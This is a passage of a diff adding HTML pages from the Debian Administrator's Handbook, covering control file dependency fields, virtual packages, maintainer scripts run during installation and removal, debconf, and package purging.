+			The Debian package is not only an archive of files intended for installation. It is part of a larger whole, and it describes its relationship with other Debian packages (dependencies, conflicts, suggestions). It also provides scripts that enable the execution of commands at different stages in the package's lifecycle (installation, removal, upgrades). These data are used by the package management tools but are not part of the packaged software; they are, within the package, what is called its “meta-information” (information about other information).
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.control"></a>5.2.1. Description: the <code
+                    class="filename">control</code> File</h3></div></div></div><a
+            id="id-1.8.6.5.2"
+            class="indexterm"></a><a
+            id="id-1.8.6.5.3"
+            class="indexterm"></a><a
+            id="id-1.8.6.5.4"
+            class="indexterm"></a><div
+            class="para">
+				This file uses a structure similar to email headers (as defined by RFC 2822). For example, for <span
+              class="pkg pkg">apt</span>, the <code
+              class="filename">control</code> file looks like the following:
+			</div><pre
+            class="screen">
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>apt-cache show apt</code></strong>
+<code
+              class="computeroutput">Package: apt
+Version: 1.4.8
+Installed-Size: 3539
+Maintainer: APT Development Team &lt;deity@lists.debian.org&gt;
+Architecture: amd64
+Replaces: apt-utils (&lt;&lt; 1.3~exp2~)
+Depends: adduser, gpgv | gpgv2 | gpgv1, debian-archive-keyring, init-system-helpers (&gt;= 1.18~), libapt-pkg5.0 (&gt;= 1.3~rc2), libc6 (&gt;= 2.15), libgcc1 (&gt;= 1:3.0), libstdc++6 (&gt;= 5.2)
+Recommends: gnupg | gnupg2 | gnupg1
+Suggests: apt-doc, aptitude | synaptic | wajig, dpkg-dev (&gt;= 1.17.2), powermgmt-base, python-apt
+Breaks: apt-utils (&lt;&lt; 1.3~exp2~)
+Description-en: commandline package manager
+ This package provides commandline tools for searching and
+ managing as well as querying information about packages
+ as a low-level access to all features of the libapt-pkg library.
+ .
+ These include:
+  * apt-get for retrieval of packages and information about them
+    from authenticated sources and for installation, upgrade and
+    removal of packages together with their dependencies
+  * apt-cache for querying available information about installed
+    as well as installable packages
+  * apt-cdrom to use removable media as a source for packages
+  * apt-config as an interface to the configuration settings
+  * apt-key as an interface to manage authentication keys
+Description-md5: 9fb97a88cb7383934ef963352b53b4a7
+Tag: admin::package-management, devel::lang:ruby, hardware::storage,
+ hardware::storage:cd, implemented-in::c++, implemented-in::perl,
+ implemented-in::ruby, interface::commandline, network::client,
+ protocol::ftp, protocol::http, protocol::ipv6, role::program,
+ scope::application, scope::utility, sound::player, suite::debian,
+ use::downloading, use::organizing, use::searching, works-with::audio,
+ works-with::software:package, works-with::text
+Section: admin
+Priority: important
+Filename: pool/main/a/apt/apt_1.4.8_amd64.deb
+Size: 1231676
+MD5sum: 4963240f23156b2dda3affc9c0d416a3
+SHA256: bc319a3abaf98d76e7e13ac97ab0ee7c238a48e2d4ab85524be8b10cfd23d50d</code></pre><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> RFC — Internet standards</strong></p></div></div></div><a
+              id="id-1.8.6.5.7.2"
+              class="indexterm"></a><a
+              id="id-1.8.6.5.7.3"
+              class="indexterm"></a><div
+              class="para">
+				RFC is the abbreviation of “Request For Comments”. An RFC is generally a technical document that describes what will become an Internet standard. Before becoming standardized and frozen, these standards are submitted for public review (hence their name). The IETF (Internet Engineering Task Force) decides on the evolution of the status of these documents (proposed standard, draft standard, or standard).
+			</div><div
+              class="para">
+				RFC 2026 defines the process for standardization of Internet protocols. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.faqs.org/rfcs/rfc2026.html">http://www.faqs.org/rfcs/rfc2026.html</a></div>
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.8.6.5.8"></a>5.2.1.1. Dependencies: the <code
+                      class="literal">Depends</code> Field</h4></div></div></div><a
+              id="id-1.8.6.5.8.2"
+              class="indexterm"></a><a
+              id="id-1.8.6.5.8.3"
+              class="indexterm"></a><a
+              id="id-1.8.6.5.8.4"
+              class="indexterm"></a><div
+              class="para">
+					The dependencies are defined in the <code
+                class="literal">Depends</code> field in the package header. This is a list of conditions to be met for the package to work correctly — this information is used by tools such as <code
+                class="command">apt</code> in order to install the required libraries, in appropriate versions fulfilling the dependencies of the package to be installed. For each dependency, it is possible to restrict the range of versions that meet that condition. In other words, it is possible to express the fact that we need the package <span
+                class="pkg pkg">libc6</span> in a version equal to or greater than “2.15” (written “<code
+                class="command">libc6 (&gt;= 2.15)</code>”). Version comparison operators are as follows:
+				</div><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="itemizedlist"><ul><li
+                  class="listitem"><div
+                    class="para">
+							<code
+                      class="command">&lt;&lt;</code>: less than;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							<code
+                      class="command">&lt;=</code>: less than or equal to;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							<code
+                      class="command">=</code>: equal to (note that “<code
+                      class="literal">2.6.1</code>” is not equal to “<code
+                      class="literal">2.6.1-1</code>”);
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							<code
+                      class="command">&gt;=</code>: greater than or equal to;
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							<code
+                      class="command">&gt;&gt;</code>: greater than.
+						</div></li></ul></div><div
+              class="para">
+					In a list of conditions to be met, the comma serves as a separator. It must be interpreted as a logical “and”. In conditions, the vertical bar (“|”) expresses a logical “or” (it is an inclusive “or”, not an exclusive “either/or”). Carrying greater priority than “and”, it can be used as many times as necessary. Thus, the dependency “(A or B) and C” is written <code
+                class="command">A | B, C</code>. In contrast, the expression “A or (B and C)” should be written as “(A or B) and (A or C)”, since the <code
+                class="literal">Depends</code> field does not tolerate parentheses that change the order of priorities between the logical operators “or” and “and”. It would thus be written <code
+                class="command">A | B, A | C</code>. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://www.debian.org/doc/debian-policy/#document-ch-relationships">https://www.debian.org/doc/debian-policy/#document-ch-relationships</a></div>
+				</div><a
+              id="id-1.8.6.5.8.8"
+              class="indexterm"></a><div
+              class="para">
+					The dependencies system is a good mechanism for guaranteeing the operation of a program, but it has another use with “meta-packages”. These are empty packages that only describe dependencies. They facilitate the installation of a consistent group of programs preselected by the meta-package maintainer; as such, <code
+                class="command">apt install <em
+                  class="replaceable">meta-package</em></code> will automatically install all of these programs using the meta-package's dependencies. The <span
+                class="pkg pkg">gnome</span>, <span
+                class="pkg pkg">kde-full</span> and <span
+                class="pkg pkg">linux-image-amd64</span> packages are examples of meta-packages.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>DEBIAN POLICY</em></span> <code
+                          class="literal">Pre-Depends</code>, a more demanding <code
+                          class="literal">Depends</code> </strong></p></div></div></div><a
+                id="id-1.8.6.5.8.10.2"
+                class="indexterm"></a><a
+                id="id-1.8.6.5.8.10.3"
+                class="indexterm"></a><div
+                class="para">
+					“Pre-dependencies”, which are listed in the “<code
+                  class="literal">Pre-Depends</code>” field in the package headers, complete the normal dependencies; their syntax is identical. A normal dependency indicates that the package in question must be unpacked and configured before configuration of the package declaring the dependency. A pre-dependency stipulates that the package in question must be unpacked and configured before execution of the pre-installation script of the package declaring the pre-dependency, that is before its installation.
+				</div><div
+                class="para">
+					A pre-dependency is very demanding for <code
+                  class="command">apt</code>, because it adds a strict constraint on the ordering of the packages to install. As such, pre-dependencies are discouraged unless absolutely necessary. It is even recommended to consult other developers on <code
+                  class="email"><a
+                    class="email"
+                    href="mailto:debian-devel@lists.debian.org">debian-devel@lists.debian.org</a></code> before adding a pre-dependency. It is generally possible to find another solution as a work-around.
+				</div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>DEBIAN POLICY</em></span> <code
+                          class="literal">Recommends</code>, <code
+                          class="literal">Suggests</code>, and <code
+                          class="literal">Enhances</code> fields</strong></p></div></div></div><a
+                id="id-1.8.6.5.8.11.2"
+                class="indexterm"></a><a
+                id="id-1.8.6.5.8.11.3"
+                class="indexterm"></a><div
+                class="para">
+					The <code
+                  class="literal">Recommends</code> and <code
+                  class="literal">Suggests</code> fields describe dependencies that are not compulsory. The “recommended” dependencies, the most important, considerably improve the functionality offered by the package but are not indispensable to its operation. The “suggested” dependencies, of secondary importance, indicate that certain packages may complement and increase their respective utility, but it is perfectly reasonable to install one without the others.
+				</div><div
+                class="para">
+					You should always install the “recommended” packages, unless you know exactly why you do not need them. Conversely, it is not necessary to install “suggested” packages unless you know why you need them.
+				</div><a
+                id="id-1.8.6.5.8.11.6"
+                class="indexterm"></a><div
+                class="para">
+					The <code
+                  class="literal">Enhances</code> field also describes a suggestion, but in a different context. It is indeed located in the suggested package, and not in the package that benefits from the suggestion. Its interest lies in that it is possible to add a suggestion without having to modify the package that is concerned. Thus, all add-ons, plug-ins, and other extensions of a program can then appear in the list of suggestions related to the software. Although it has existed for several years, this last field is still largely ignored by programs such as <code
+                  class="command">apt</code> or <code
+                  class="command">synaptic</code>. Its purpose is for a suggestion made by the <code
+                  class="literal">Enhances</code> field to appear to the user in addition to the traditional suggestions — found in the <code
+                  class="literal">Suggests</code> field.
+				</div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.8.6.5.9"></a>5.2.1.2. Conflicts: the <code
+                      class="literal">Conflicts</code> field</h4></div></div></div><a
+              id="id-1.8.6.5.9.2"
+              class="indexterm"></a><a
+              id="id-1.8.6.5.9.3"
+              class="indexterm"></a><a
+              id="id-1.8.6.5.9.4"
+              class="indexterm"></a><div
+              class="para">
+					The <code
+                class="literal">Conflicts</code> field indicates when a package cannot be installed simultaneously with another. The most common reasons for this are that both packages include a file of the same name, or provide the same service on the same TCP port, or would hinder each other's operation.
+				</div><div
+              class="para">
+					<code
+                class="command">dpkg</code> will refuse to install a package if it triggers a conflict with an already installed package, except if the new package specifies that it will “replace” the installed package, in which case <code
+                class="command">dpkg</code> will choose to replace the old package with the new one. <code
+                class="command">apt</code> always follows your instructions: if you choose to install a new package, it will automatically offer to uninstall the package that poses a problem.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.8.6.5.10"></a>5.2.1.3. Incompatibilities: the <code
+                      class="literal">Breaks</code> Field</h4></div></div></div><a
+              id="id-1.8.6.5.10.2"
+              class="indexterm"></a><a
+              id="id-1.8.6.5.10.3"
+              class="indexterm"></a><a
+              id="id-1.8.6.5.10.4"
+              class="indexterm"></a><div
+              class="para">
+					The <code
+                class="literal">Breaks</code> field has an effect similar to that of the <code
+                class="literal">Conflicts</code> field, but with a special meaning. It signals that the installation of a package will “break” another package (or particular versions of it). In general, this incompatibility between two packages is transitory, and the <code
+                class="literal">Breaks</code> relationship specifically refers to the incompatible versions.
+				</div><div
+              class="para">
+					<code
+                class="command">dpkg</code> will refuse to install a package that breaks an already installed package, and <code
+                class="command">apt</code> will try to resolve the problem by updating the package that would be broken to a newer version (which is assumed to be fixed and, thus, compatible again).
+				</div><div
+              class="para">
+					This type of situation may occur in the case of updates without backwards compatibility: this is the case if the new version no longer functions with the older version, and causes a malfunction in another program without making special provisions. The <code
+                class="literal">Breaks</code> field prevents the user from running into these problems.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.8.6.5.11"></a>5.2.1.4. Provided Items: the <code
+                      class="literal">Provides</code> Field</h4></div></div></div><a
+              id="id-1.8.6.5.11.2"
+              class="indexterm"></a><div
+              class="para">
+					This field introduces the very interesting concept of a “virtual package”. It has many roles, but two are of particular importance. The first role consists in using a virtual package to associate a generic service with it (the package “provides” the service). The second indicates that a package completely replaces another, and that for this purpose it can also satisfy the dependencies that the other would satisfy. It is thus possible to create a substitution package without having to use the same package name.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>VOCABULARY</em></span> Meta-package and virtual package</strong></p></div></div></div><a
+                id="id-1.8.6.5.11.4.2"
+                class="indexterm"></a><a
+                id="id-1.8.6.5.11.4.3"
+                class="indexterm"></a><a
+                id="id-1.8.6.5.11.4.4"
+                class="indexterm"></a><div
+                class="para">
+					It is essential to clearly distinguish meta-packages from virtual packages. The former are real packages (including real <code
+                  class="filename">.deb</code> files), whose only purpose is to express dependencies.
+				</div><div
+                class="para">
+					Virtual packages, however, do not exist physically; they are only a means of identifying real packages based on common, logical criteria (service provided, compatibility with a standard program or a pre-existing package, etc.).
+				</div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h5
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.8.6.5.11.5"></a>5.2.1.4.1. Providing a “Service”</h5></div></div></div><div
+                class="para">
+						Let us discuss the first case in greater detail with an example: all mail servers, such as <span
+                  class="pkg pkg">postfix</span> or <span
+                  class="pkg pkg">sendmail</span> are said to “provide” the <span
+                  class="pkg pkg">mail-transport-agent</span> virtual package. Thus, any package that needs this service to be functional (e.g. a mailing list manager, such as <span
+                  class="pkg pkg">smartlist</span> or <span
+                  class="pkg pkg">sympa</span>) simply states in its dependencies that it requires a <span
+                  class="pkg pkg">mail-transport-agent</span> instead of specifying a large yet incomplete list of possible solutions (e.g. <code
+                  class="command">postfix | sendmail | exim4 | …</code>). Furthermore, it is useless to install two mail servers on the same machine, which is why each of these packages declares a conflict with the <span
+                  class="pkg pkg">mail-transport-agent</span> virtual package. A conflict between a package and itself is ignored by the system, but this technique will prohibit the installation of two mail servers side by side.
+					</div><div
+                class="sidebar"><div
+                  class="titlepage"><div><div><p
+                        class="title"><strong><span
+                            class="emphasis"><em>DEBIAN POLICY</em></span> List of virtual packages</strong></p></div></div></div><a
+                  id="id-1.8.6.5.11.5.3.2"
+                  class="indexterm"></a><div
+                  class="para">
+						For virtual packages to be useful, everyone must agree on their name. This is why they are standardized in the Debian Policy. The list includes among others <span
+                    class="pkg pkg">mail-transport-agent</span> for mail servers, <span
+                    class="pkg pkg">c-compiler</span> for C programming language compilers, <span
+                    class="pkg pkg">www-browser</span> for web browsers, <span
+                    class="pkg pkg">httpd</span> for web servers, <span
+                    class="pkg pkg">ftp-server</span> for FTP servers, <span
+                    class="pkg pkg">x-terminal-emulator</span> for terminal emulators in graphical mode (<code
+                    class="command">xterm</code>), and <span
+                    class="pkg pkg">x-window-manager</span> for window managers.
+					</div><div
+                  class="para">
+						The full list can be found on the Web. <div
+                    xmlns=""
+                    class="url">→ <a
+                      xmlns="http://www.w3.org/1999/xhtml"
+                      href="http://www.debian.org/doc/packaging-manuals/virtual-package-names-list.txt">http://www.debian.org/doc/packaging-manuals/virtual-package-names-list.txt</a></div>
+					</div></div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h5
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.8.6.5.11.6"></a>5.2.1.4.2. Interchangeability with Another Package</h5></div></div></div><div
+                class="para">
+						The <code
+                  class="literal">Provides</code> field is also interesting when the content of a package is included in a larger package. For example, the <span
+                  class="pkg pkg">libdigest-md5-perl</span> Perl module was an optional module in Perl 5.6, and has been integrated as standard in Perl 5.8 (and later versions, such as 5.24 present in <span
+                  class="distribution distribution">Stretch</span>). As such, the package <span
+                  class="pkg pkg">perl</span> has since version 5.8 declared <code
+                  class="literal">Provides: libdigest-md5-perl</code> so that the dependencies on this package are met if the user has Perl 5.8 (or newer). The <span
+                  class="pkg pkg">libdigest-md5-perl</span> package itself has eventually been deleted, since it no longer had any purpose when old Perl versions were removed.
+					</div><div
+                class="figure"><a
+                  xmlns=""
+                  id="id-1.8.6.5.11.6.3"></a><div
+                  class="figure-contents"><div
+                    class="mediaobject"><img
+                      src="images/virtual-package.png"
+                      alt="Use of a Provides field in order to not break dependencies" /></div></div><p
+                  class="title"><strong>Obrázek 5.1. Use of a <code
+                      class="literal">Provides</code> field in order to not break dependencies</strong></p></div><div
+                class="para">
+						This feature is very useful, since it is never possible to anticipate the vagaries of development, and it is necessary to be able to adjust to renaming, and other automatic replacement, of obsolete software.
+					</div><div
+                class="sidebar"><div
+                  class="titlepage"><div><div><p
+                        class="title"><strong><span
+                            class="emphasis"><em>BACK TO BASICS</em></span> Perl, a programming language</strong></p></div></div></div><a
+                  id="id-1.8.6.5.11.6.5.2"
+                  class="indexterm"></a><a
+                  id="id-1.8.6.5.11.6.5.3"
+                  class="indexterm"></a><div
+                  class="para">
+						Perl (Practical Extraction and Report Language) is a very popular programming language. It has many ready-to-use modules that cover a vast spectrum of applications, and that are distributed by the CPAN (Comprehensive Perl Archive Network) servers, an exhaustive network of Perl packages. <div
+                    xmlns=""
+                    class="url">→ <a
+                      xmlns="http://www.w3.org/1999/xhtml"
+                      href="http://www.perl.org/">http://www.perl.org/</a></div> <div
+                    xmlns=""
+                    class="url">→ <a
+                      xmlns="http://www.w3.org/1999/xhtml"
+                      href="http://www.cpan.org/">http://www.cpan.org/</a></div>
+					</div><div
+                  class="para">
+						Since it is an interpreted language, a program written in Perl does not require compilation prior to execution. This is why they are called “Perl scripts”.
+					</div></div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h5
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.8.6.5.11.7"></a>5.2.1.4.3. Past Limitations</h5></div></div></div><div
+                class="para">
+						Virtual packages used to suffer from some limitations, the most significant of which was the absence of a version number. To return to the previous example, a dependency such as <code
+                  class="literal">Depends: libdigest-md5-perl (&gt;= 1.6)</code>, despite the presence of Perl 5.10, would never be considered as satisfied by the packaging system — while in fact it most likely is satisfied. Unaware of this, the package system chose the least risky option, assuming that the versions do not match.
+					</div><div
+                class="para">
+						This limitation has been lifted in <span
+                  class="pkg pkg">dpkg</span> 1.17.11, and is no longer relevant in Stretch. Packages can assign a version to the virtual packages they provide with a dependency such as <code
+                  class="literal">Provides: libdigest-md5-perl (= 1.8)</code>.
+					</div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.8.6.5.12"></a>5.2.1.5. Replacing Files: The <code
+                      class="literal">Replaces</code> Field</h4></div></div></div><a
+              id="id-1.8.6.5.12.2"
+              class="indexterm"></a><a
+              id="id-1.8.6.5.12.3"
+              class="indexterm"></a><a
+              id="id-1.8.6.5.12.4"
+              class="indexterm"></a><div
+              class="para">
+					The <code
+                class="literal">Replaces</code> field indicates that the package contains files that are also present in another package, but that the package is legitimately entitled to replace them. Without this specification, <code
+                class="command">dpkg</code> fails, stating that it can not overwrite the files of another package (technically, it is possible to force it to do so with the <code
+                class="literal">--force-overwrite</code> option, but that is not considered standard operation). This allows identification of potential problems and requires the maintainer to study the matter prior to choosing whether to add such a field.
+				</div><div
+              class="para">
+					The use of this field is justified when package names change or when a package is included in another. This also happens when the maintainer decides to distribute files differently among various binary packages produced from the same source package: a replaced file no longer belongs to the old package, but only to the new one.
+				</div><div
+              class="para">
+					If all of the files in an installed package have been replaced, the package is considered to be removed. Finally, this field also encourages <code
+                class="command">dpkg</code> to remove the replaced package where there is a conflict.
+				</div><div
+              class="sidebar"><a
+                xmlns=""
+                id="sidebar.debtags"></a><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>GOING FURTHER</em></span> The <code
+                          class="literal">Tag</code> field</strong></p></div></div></div><div
+                class="para">
+					In the <span
+                  class="pkg pkg">apt</span> example above, we can see the presence of a field that we have not yet described, the <code
+                  class="literal">Tag</code> field. This field does not describe a relationship between packages, but is simply a way of categorizing a package in a thematic taxonomy. This classification of packages according to several criteria (type of interface, programming language, domain of application, etc.) has been available for a long time. Despite this, not all packages have accurate tags and it is not yet integrated in all Debian tools; <code
+                  class="command">aptitude</code> displays these tags, and allows them to be used as search criteria. For those who are repelled by <code
+                  class="command">aptitude</code>'s search criteria, the following website allows navigation of the tag database: <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="https://wiki.debian.org/Debtags">https://wiki.debian.org/Debtags</a></div>
+				</div></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.configuration-scripts"></a>5.2.2. Configuration Scripts</h3></div></div></div><a
+            id="id-1.8.6.6.2"
+            class="indexterm"></a><a
+            id="id-1.8.6.6.3"
+            class="indexterm"></a><a
+            id="id-1.8.6.6.4"
+            class="indexterm"></a><a
+            id="id-1.8.6.6.5"
+            class="indexterm"></a><a
+            id="id-1.8.6.6.6"
+            class="indexterm"></a><div
+            class="para">
+				In addition to the <code
+              class="filename">control</code> file, the <code
+              class="filename">control.tar.gz</code> archive for each Debian package may contain a number of scripts, called by <code
+              class="command">dpkg</code> at different stages in the processing of a package. The Debian Policy describes the possible cases in detail, specifying the scripts called and the arguments that they receive. These sequences may be complicated, since if one of the scripts fails, <code
+              class="command">dpkg</code> will try to return to a satisfactory state by canceling the installation or removal in progress (insofar as it is possible).
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>GOING FURTHER</em></span> <code
+                        class="command">dpkg</code>'s database</strong></p></div></div></div><a
+              id="id-1.8.6.6.8.2"
+              class="indexterm"></a><a
+              id="id-1.8.6.6.8.3"
+              class="indexterm"></a><div
+              class="para">
+				All of the configuration scripts for installed packages are stored in the <code
+                class="filename">/var/lib/dpkg/info/</code> directory, in the form of a file prefixed with the package's name. This directory also includes a file with the <code
+                class="filename">.list</code> extension for each package, containing the list of files that belong to that package.
+			</div><div
+              class="para">
+				The <code
+                class="filename">/var/lib/dpkg/status</code> file contains a series of data blocks (in the format of the famous mail headers, RFC 2822) describing the status of each package. The information from the <code
+                class="filename">control</code> file of the installed packages is also replicated there.
+			</div></div><div
+            class="para">
+				In general, the <code
+              class="filename">preinst</code> script is executed prior to installation of the package, while the <code
+              class="filename">postinst</code> follows it. Likewise, <code
+              class="filename">prerm</code> is invoked before removal of a package and <code
+              class="filename">postrm</code> afterwards. An update of a package is equivalent to removal of the previous version and installation of the new one. It is not possible to describe in detail all the possible scenarios here, but we will discuss the most common two: an installation/update and a removal.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>CAUTION</em></span> Symbolic names of the scripts</strong></p></div></div></div><div
+              class="para">
+				The sequences described in this section call configuration scripts by specific names, such as <code
+                class="command">old-prerm</code> or <code
+                class="command">new-postinst</code>. They are, respectively, the <code
+                class="command">prerm</code> script contained in the old version of the package (installed before the update) and the <code
+                class="command">postinst</code> script contained in the new version (installed by the update).
+			</div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TIP</em></span> State diagrams</strong></p></div></div></div><div
+              class="para">
+				Manoj Srivastava made these diagrams explaining how the configuration scripts are called by <code
+                class="command">dpkg</code>. Similar diagrams have also been developed by the Debian Women project; they are a bit simpler to understand, but less complete. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://people.debian.org/~srivasta/MaintainerScripts.html">https://people.debian.org/~srivasta/MaintainerScripts.html</a></div> <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="https://www.debian.org/doc/debian-policy/#maintainer-script-flowcharts">https://www.debian.org/doc/debian-policy/#maintainer-script-flowcharts</a></div>
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.8.6.6.12"></a>5.2.2.1. Installation and Upgrade</h4></div></div></div><a
+              id="id-1.8.6.6.12.2"
+              class="indexterm"></a><div
+              class="para">
+					Here is what happens during an installation (or an update):
+				</div><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="orderedlist"><ol><li
+                  class="listitem"><div
+                    class="para">
+							For an update, <code
+                      class="command">dpkg</code> calls the <code
+                      class="command">old-prerm upgrade <em
+                        class="replaceable">new-version</em></code>.
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							Still for an update, <code
+                      class="command">dpkg</code> then executes <code
+                      class="command">new-preinst upgrade <em
+                        class="replaceable">old-version</em></code>; for a first installation, it executes <code
+                      class="command">new-preinst install</code>. It may add the old version in the last parameter, if the package has already been installed and removed since (but not purged, the configuration files having been retained).
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							The new package files are then unpacked. If a file already exists, it is replaced, but a backup copy is temporarily made.
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							For an update, <code
+                      class="command">dpkg</code> executes <code
+                      class="command">old-postrm upgrade <em
+                        class="replaceable">new-version</em></code>.
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							<code
+                      class="command">dpkg</code> updates all of the internal data (file list, configuration scripts, etc.) and removes the backups of the replaced files. This is the point of no return: <code
+                      class="command">dpkg</code> no longer has access to all of the elements necessary to return to the previous state.
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							<code
+                      class="command">dpkg</code> will update the configuration files, asking the user to decide if it is unable to automatically manage this task. The details of this procedure are discussed in <a
+                      class="xref"
+                      href="sect.package-meta-information.html#sect.conffiles">5.2.3 – „Checksums, List of Configuration Files“</a>.
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							Finally, <code
+                      class="command">dpkg</code> configures the package by executing <code
+                      class="command">new-postinst configure <em
+                        class="replaceable">last-version-configured</em></code>.
+						</div></li></ol></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.8.6.6.13"></a>5.2.2.2. Package Removal</h4></div></div></div><div
+              class="para">
+					Here is what happens during a package removal:
+				</div><div
+              xmlns:d="http://docbook.org/ns/docbook"
+              class="orderedlist"><ol><li
+                  class="listitem"><div
+                    class="para">
+							<code
+                      class="command">dpkg</code> calls <code
+                      class="command">prerm remove</code>.
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							<code
+                      class="command">dpkg</code> removes all of the package's files, with the exception of the configuration files and configuration scripts.
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							<code
+                      class="command">dpkg</code> executes <code
+                      class="command">postrm remove</code>. All of the configuration scripts, except <code
+                      class="filename">postrm</code>, are removed. If the user has not used the “purge” option, the process stops here.
+						</div></li><li
+                  class="listitem"><div
+                    class="para">
+							For a complete purge of the package (command issued with <code
+                      class="command">dpkg --purge</code> or <code
+                      class="command">dpkg -P</code>), the configuration files are also deleted, as well as a certain number of copies (<code
+                      class="filename">*.dpkg-tmp</code>, <code
+                      class="filename">*.dpkg-old</code>, <code
+                      class="filename">*.dpkg-new</code>) and temporary files; <code
+                      class="command">dpkg</code> then executes <code
+                      class="command">postrm purge</code>.
+						</div></li></ol></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>VOCABULARY</em></span> Purge, a complete removal</strong></p></div></div></div><a
+                id="id-1.8.6.6.13.4.2"
+                class="indexterm"></a><div
+                class="para">
+					When a Debian package is removed, the configuration files are retained in order to facilitate possible re-installation. Likewise, the data generated by a daemon (such as the content of an LDAP server directory, or the content of a database for an SQL server) are usually retained.
+				</div><div
+                class="para">
+					To remove all data associated with a package, it is necessary to “purge” the package with the command, <code
+                  class="command">dpkg -P <em
+                    class="replaceable">package</em></code>, <code
+                  class="command">apt-get remove --purge <em
+                    class="replaceable">package</em></code> or <code
+                  class="command">aptitude purge <em
+                    class="replaceable">package</em></code>.
+				</div><div
+                class="para">
+					Given the definitive nature of such data removals, a purge should not be taken lightly.
+				</div></div><a
+              id="id-1.8.6.6.13.5"
+              class="indexterm"></a><div
+              class="para">
+					The four scripts detailed above are complemented by a <code
+                class="filename">config</code> script, provided by packages using <code
+                class="command">debconf</code> to acquire information from the user for configuration. During installation, this script defines in detail the questions asked by <code
+                class="command">debconf</code>. The responses are recorded in the <code
+                class="command">debconf</code> database for future reference. The script is generally executed by <code
+                class="command">apt</code> prior to installing packages one by one in order to group all the questions and ask them all to the user at the beginning of the process. The pre- and post-installation scripts can then use this information to operate according to the user's wishes.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>TOOL</em></span> <code
+                          class="command">debconf</code></strong></p></div></div></div><a
+                id="id-1.8.6.6.13.7.2"
+                class="indexterm"></a><div
+                class="para">
+					<code
+                  class="command">debconf</code> was created to resolve a recurring problem in Debian. All Debian packages unable to function without a minimum of configuration used to ask questions with calls to the <code
+                  class="command">echo</code> and <code
+                  class="command">read</code> commands in <code
+                  class="filename">postinst</code> shell scripts (and other similar scripts). But this also means that during a large installation or update the user must stay with their computer to respond to various questions that may arise at any time. These manual interactions have now been almost entirely dispensed with, thanks to the <code
+                  class="command">debconf</code> tool.
+				</div><div
+                class="para">
+					<code
+                  class="command">debconf</code> has many interesting features: it requires the developer to specify user interaction; it allows localization of all the strings displayed to users (all translations are stored in the <code
+                  class="filename">templates</code> file describing the interactions); it has different frontends to display the questions to the user (text mode, graphical mode, non-interactive); and it allows creation of a central database of responses to share the same configuration with several computers... but the most important is that it is now possible to present all of the questions in a row to the user, prior to starting a long installation or update process. The user can go about their business while the system handles the installation on its own, without having to stay there staring at the screen waiting for questions.
+				</div></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.conffiles"></a>5.2.3. Checksums, List of Configuration Files</h3></div></div></div><a
